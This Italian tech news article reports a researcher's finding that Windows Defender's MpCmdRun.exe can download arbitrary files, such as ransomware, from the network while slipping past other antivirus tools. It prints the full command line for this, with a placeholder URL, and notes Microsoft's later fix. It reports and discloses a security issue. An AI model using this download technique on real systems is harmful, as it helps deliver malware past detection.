2484 Letture
Perché Windows Defender potrebbe essere usato per scaricare malware

Perché Windows Defender potrebbe essere usato per scaricare malware

Ricercatore scopre che uno dei componenti di sistema di Windows Defender (Microsoft Defender) può essere usato per scaricare file in modo arbitrario dalla rete.

Un ricercatore esperto di sicurezza informatica, Mohammad Askar, ha pubblicato un tweet che ha fatto non poco scalpore: un componente che è parte integrante di Windows Defender (da qualche tempo rinominato in Microsoft Defender) potrebbe essere addirittura sfruttato per scaricare malware.
Si tratta del file eseguibile MpCmdRun.exe che risiede nella cartella di Windows Defender e che è presente di default nell'installazione dell'antimalware di casa Microsoft.




Askar ha spiegato che usando una sintassi simile alla seguente è di fatto possibile disporre il download automatico di qualunque file dalla rete memorizzandolo nella cartella specificata (nell'esempio %userprofile% indica la directory radice del profilo utente Windows in uso: vedere Breve guida all'uso delle variabili d'ambiente in Windows):

"%programdata%\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -DownloadFile -url URL_FILE_REMOTO -path %userprofile%

Provando a scaricare, a mo’ di test, l'eseguibile del ransomware WastedLocker il download avviene senza problemi.
La buona notizia è che Windows Defender rileverà poi i file dannosi scaricati con MpCmdRun.exe ma al momento è probabile che altri software antivirus possano cadere nel tranello riconoscendo l'eseguibile Microsoft come un file legittimo anche perché dotato di una firma digitale perfettamente valida.


Per non parlare del fatto che MpCmdRun.exe potrebbe essere utilizzato in attacchi evoluti scaricando parte del codice nocivo con un componente di sistema e combinandolo con l'utilizzo di altre vulnerabilità.
Ne abbiamo parlato nell'articolo Alcuni eseguibili di Windows 10 consentono il download di file potenzialmente dannosi.

Aggiornamento: i tecnici dell'azienda di Redmond hanno risolto il problema rimuovendo il supporto per l'opzione -DownloadFile a partire dalla release 4.18.2009.2-0 di Microsoft Defender.

Perché Windows Defender potrebbe essere usato per scaricare malware